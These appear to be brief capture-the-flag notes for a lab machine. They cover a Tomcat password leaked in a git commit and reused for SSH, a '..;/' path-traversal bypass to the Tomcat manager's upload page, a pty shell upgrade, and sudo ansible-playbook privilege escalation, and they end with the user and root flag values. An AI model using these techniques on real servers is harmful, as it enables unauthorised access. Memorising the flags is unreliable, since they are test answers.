IP : 10.10.10.250
nmap scan
 [ http://10.10.10.250:8080/signin;jsessionid=node01twh7urbagtk6150jhod4xei2875.node0?redirect=%2F ]
 {Tomcat user password} : [ http://10.10.10.250:8080/root/seal_market/commit/971f3aa3f0a0cc8aac12fd696d9631ca540f44c7 ]
 <user username="tomcat" password="42MrHBf*z8{Z%" roles="manager-gui,admin-gui"/
 {Login with} [usrname : "luis"     Password : "42MrHBf*z8{Z%"  ]
 {directory brute forcing at port 443}
 {Tomcat login} [https://10.10.10.250/manager/status]
{exploit did not worked so second method is directory treversal } [ Treverse link "https://10.10.10.250/manager/status/..;/html" ]
Got deploy option 
/manager/jmxproxy/..;/html/upload?



which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
ssh -i id_rsa luis@10.10.10.250

sudo ansible-playbook chalja.yml



userflag 026e5ec650c7c992fdd4087b07ad06d1
rootflag 4ae26f0d1c9837b7280c7a117439f7bf
        

